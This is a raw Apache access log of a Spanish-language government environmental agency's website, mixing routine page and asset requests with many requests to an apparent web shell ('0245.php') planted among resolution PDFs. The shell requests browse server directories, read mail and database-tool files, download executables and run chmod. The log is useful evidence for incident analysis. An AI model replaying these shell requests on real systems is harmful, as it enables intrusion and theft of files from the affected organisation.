18.216.87.156 - - [13/Jun/2024:07:53:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5320.pdf&ft=txt&white=1 HTTP/1.1" 200 3006
216.244.66.195 - - [13/Jun/2024:07:53:22 -0500] "GET /BLA/resoluciones/AUTOS%202013/1967.pdf HTTP/1.1" 200 1656110
66.249.66.37 - - [13/Jun/2024:07:53:24 -0500] "GET /mas-de-738-personas-asistieron-a-la-feria-ambiental-de-servicios-a-la-ciudadania-2023.html HTTP/1.1" 304 -
47.128.27.144 - - [13/Jun/2024:07:53:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=bearhlp-de.htm&ft=notepad&white=1 HTTP/1.1" 200 23166
201.245.192.253 - - [13/Jun/2024:07:53:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.32.217 - - [13/Jun/2024:07:53:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=tbl_indexes.php&ft=html&white=1 HTTP/1.1" 200 602
3.17.162.76 - - [13/Jun/2024:07:53:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1659.pdf&ft=info HTTP/1.1" 200 3847
191.95.48.121 - - [13/Jun/2024:07:53:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 115688
191.95.48.121 - - [13/Jun/2024:07:53:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:53:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:53:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:53:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:53:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:53:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.95.48.121 - - [13/Jun/2024:07:53:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.31.30 - - [13/Jun/2024:07:53:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page59_thumbnail.jpg&ft=download HTTP/1.1" 200 5428
3.129.70.254 - - [13/Jun/2024:07:53:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2555.pdf&ft=info HTTP/1.1" 200 3876
18.116.87.88 - - [13/Jun/2024:07:54:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2106.pdf&ft=img HTTP/1.1" 200 15951
47.128.38.184 - - [13/Jun/2024:07:54:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Ctcpdf%5C&f=LICENSE.TXT&ft=code&white=1 HTTP/1.1" 200 16689
47.128.36.113 - - [13/Jun/2024:07:54:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+Ambiental%5C&f=126PM03-PR28.pdf&ft=notepad HTTP/1.1" 200 223075
47.128.45.114 - - [13/Jun/2024:07:54:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CCobro+Evaluacion+Certificaci%F3n+Para+La+Deducci%F3n+Por+Inversi%F3n+En+Medio+Ambiente%5C&f=Acreditaci%F3n+o+Certificaci%F3n+de+Inversi%F3n+Ambiental.pdf&ft=notepad&white=1 HTTP/1.1" 200 36802
201.245.192.253 - - [13/Jun/2024:07:54:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [13/Jun/2024:07:54:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e481752881b84f22b743a1054ef89b00.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.48.78 - - [13/Jun/2024:07:54:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/%22%20%20%20%20%20%20.%20esc_url(%20apply_filters( HTTP/1.1" 403 1006
173.252.107.17 - - [13/Jun/2024:07:54:42 -0500] "GET /secretaria-de-ambiente-invita-a-proteger-la-culebra-sabanera.html HTTP/1.1" 200 924
201.245.192.253 - - [13/Jun/2024:07:54:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a750be208357415f9567860caba0fe0f.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.20.4 - - [13/Jun/2024:07:53:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1864.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 687830
3.22.249.90 - - [13/Jun/2024:07:54:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4280.pdf&ft=html&white=1 HTTP/1.1" 200 345233
47.128.43.105 - - [13/Jun/2024:07:54:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5C&f=wp-links-opml.php&ft=notepad&white=1 HTTP/1.1" 200 2380
172.22.2.4 - - [13/Jun/2024:07:54:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [13/Jun/2024:07:54:51 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [13/Jun/2024:07:54:52 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [13/Jun/2024:07:54:53 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [13/Jun/2024:07:54:54 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [13/Jun/2024:07:54:54 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [13/Jun/2024:07:54:54 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [13/Jun/2024:07:54:54 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [13/Jun/2024:07:54:54 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [13/Jun/2024:07:54:54 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [13/Jun/2024:07:54:54 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
47.128.48.62 - - [13/Jun/2024:07:54:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CRESOURCE%5C&f=rescom.exe&ft=download HTTP/1.1" 200 90112
47.128.42.81 - - [13/Jun/2024:07:55:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=Thumbs.db&ft=download HTTP/1.1" 200 215552
216.244.66.195 - - [13/Jun/2024:07:55:10 -0500] "GET /BLA/resoluciones/AUTOS%202016/0239.pdf HTTP/1.1" 200 618005
172.22.2.4 - - [13/Jun/2024:07:55:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3801&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 626
47.128.109.45 - - [13/Jun/2024:07:55:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150906-0250-515000.txt&ft=notepad&white=1 HTTP/1.1" 200 683
172.22.2.4 - - [13/Jun/2024:07:55:25 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=03801&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 626
47.128.16.141 - - [13/Jun/2024:07:55:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&f=page17_thumbnail.jpg&ft=download HTTP/1.1" 200 9061
201.245.192.253 - - [13/Jun/2024:07:55:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.7 - - [13/Jun/2024:07:55:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page78.swf&ft=notepad HTTP/1.1" 200 27722
216.244.66.195 - - [13/Jun/2024:07:55:40 -0500] "GET /BLA/resoluciones/AUTOS%202016/0472.pdf HTTP/1.1" 200 775802
172.22.2.4 - - [13/Jun/2024:07:55:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=03801&usuario=&sector=SILVICULTURA&fecha=2019&resuelve= HTTP/1.1" 200 626
47.128.22.95 - - [13/Jun/2024:07:55:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5Cdmz&f=xampp_start.exe HTTP/1.1" 200 118784
18.191.28.133 - - [13/Jun/2024:07:55:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1210.pdf&ft=txt HTTP/1.1" 200 3008
18.191.165.226 - - [13/Jun/2024:07:55:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1709.pdf HTTP/1.1" 200 3036
47.128.98.146 - - [13/Jun/2024:07:55:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=display_export.inc.php&ft=notepad HTTP/1.1" 200 1703
172.22.2.4 - - [13/Jun/2024:07:56:01 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=03801&usuario=&sector=SILVICULTURA&fecha=2019&resuelve= HTTP/1.1" 200 626
47.128.45.240 - - [13/Jun/2024:07:56:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5C&f=prueba.php&ft=notepad&white=1 HTTP/1.1" 200 195
216.244.66.195 - - [13/Jun/2024:07:56:15 -0500] "GET /BLA/resoluciones/AUTOS%202016/0669.pdf HTTP/1.1" 200 480238
3.17.76.218 - - [13/Jun/2024:07:56:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1840.pdf&ft=edit&white=1 HTTP/1.1" 200 3105
47.128.51.218 - - [13/Jun/2024:07:56:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg%5C&f=logo_Bicentenario.gif&ft=notepad HTTP/1.1" 200 5864
172.22.2.4 - - [13/Jun/2024:07:56:33 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=03801&usuario=&sector=SILVICULTURA&fecha=2019&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [13/Jun/2024:07:56:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [13/Jun/2024:07:56:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e481752881b84f22b743a1054ef89b00.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [13/Jun/2024:07:56:39 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [13/Jun/2024:07:56:39 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [13/Jun/2024:07:56:39 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [13/Jun/2024:07:56:39 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [13/Jun/2024:07:56:40 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [13/Jun/2024:07:56:40 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
216.244.66.195 - - [13/Jun/2024:07:56:43 -0500] "GET /BLA/resoluciones/AUTOS%202016/1078.pdf HTTP/1.1" 200 235263
201.245.192.253 - - [13/Jun/2024:07:56:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a750be208357415f9567860caba0fe0f.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [13/Jun/2024:07:56:47 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [13/Jun/2024:07:56:47 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [13/Jun/2024:07:56:47 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
47.128.18.216 - - [13/Jun/2024:07:56:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page23_thumbnail.jpg&ft=download HTTP/1.1" 200 11597
172.22.2.4 - - [13/Jun/2024:07:56:47 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [13/Jun/2024:07:56:52 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
47.128.29.237 - - [13/Jun/2024:07:56:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=widgets.php&ft=notepad&white=1 HTTP/1.1" 200 53599
47.128.31.29 - - [13/Jun/2024:07:57:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages&f=page63_thumbnail.jpg&ft=download HTTP/1.1" 200 4946
66.249.66.19 - - [13/Jun/2024:07:57:09 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3880.pdf HTTP/1.1" 304 -
172.22.2.4 - - [13/Jun/2024:07:57:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=03801&usuario=&sector=SILVICULTURA&fecha=2019&resuelve= HTTP/1.1" 200 626
216.244.66.195 - - [13/Jun/2024:07:57:11 -0500] "GET /BLA/resoluciones/AUTOS%202016/1150.pdf HTTP/1.1" 200 345685
18.188.200.164 - - [13/Jun/2024:07:57:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1653.pdf&ft=edit HTTP/1.1" 200 3103
172.22.2.4 - - [13/Jun/2024:07:57:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=03801&usuario=rosmary.otalora&sector=SILVICULTURA&fecha=2019&resuelve= HTTP/1.1" 200 626
47.128.18.200 - - [13/Jun/2024:07:56:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg%5C&f=portada_pinturas.jpg&ft=img&white=1 HTTP/1.1" 200 194243
172.22.2.4 - - [13/Jun/2024:07:57:20 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=03801&usuario=rosmary.otalora&sector=SILVICULTURA&fecha=2019&resuelve= HTTP/1.1" 200 626
201.245.192.253 - - [13/Jun/2024:07:57:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.44.85 - - [13/Jun/2024:07:57:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=plugin-editor.php&ft=notepad&white=1 HTTP/1.1" 200 11532
47.128.31.65 - - [13/Jun/2024:07:57:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cfarmaceutica%5Cfiles%5Csearch&f=search98.xml&ft=download HTTP/1.1" 200 4904
201.245.192.253 - - [13/Jun/2024:07:57:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [13/Jun/2024:07:57:37 -0500] "GET /BLA/resoluciones/AUTOS%202016/1300.pdf HTTP/1.1" 200 321731
172.22.2.4 - - [13/Jun/2024:07:56:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.52.59 - - [13/Jun/2024:07:57:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150904-1414-471000.txt&ft=notepad&white=1 HTTP/1.1" 200 653
172.22.2.4 - - [13/Jun/2024:07:56:48 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 24523
216.245.221.92 - - [13/Jun/2024:07:57:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Jun/2024:07:57:57 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.52.80 - - [13/Jun/2024:07:57:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=media-upload.min.js&ft=notepad&white=1 HTTP/1.1" 200 1153
216.244.66.195 - - [13/Jun/2024:07:58:03 -0500] "GET /BLA/resoluciones/AUTOS%202016/1353.pdf HTTP/1.1" 200 315410
47.128.121.129 - - [13/Jun/2024:07:58:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=capabilities.php&ft=notepad&white=1 HTTP/1.1" 200 40038
3.133.149.137 - - [13/Jun/2024:07:58:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1669.pdf&ft=download HTTP/1.1" 200 646128
47.128.60.111 - - [13/Jun/2024:07:58:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=Mesa-Servicios.flv&ft=notepad&white=1 HTTP/1.1" 200 278207
172.22.2.4 - - [13/Jun/2024:07:56:39 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 41968
3.149.243.18 - - [13/Jun/2024:07:58:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4558.pdf HTTP/1.1" 200 2902
216.244.66.195 - - [13/Jun/2024:07:58:27 -0500] "GET /BLA/resoluciones/AUTOS%202016/1403.pdf HTTP/1.1" 200 962261
181.237.30.29 - - [13/Jun/2024:07:58:30 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12410
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
172.22.2.4 - - [13/Jun/2024:07:56:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40264
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.237.30.29 - - [13/Jun/2024:07:58:31 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
47.128.52.87 - - [13/Jun/2024:07:58:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4562.pdf&ft=notepad HTTP/1.1" 200 839369
201.245.192.253 - - [13/Jun/2024:07:58:34 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [13/Jun/2024:07:58:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e481752881b84f22b743a1054ef89b00.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.98.228 - - [13/Jun/2024:07:57:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0189.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 1298134
47.128.117.88 - - [13/Jun/2024:07:58:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=stdfw_2.mer&ft=notepad HTTP/1.1" 200 1901
181.237.30.29 - - [13/Jun/2024:07:58:45 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2216
181.237.30.29 - - [13/Jun/2024:07:58:45 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
201.245.192.253 - - [13/Jun/2024:07:58:47 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a750be208357415f9567860caba0fe0f.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16470
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.237.30.29 - - [13/Jun/2024:07:58:48 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
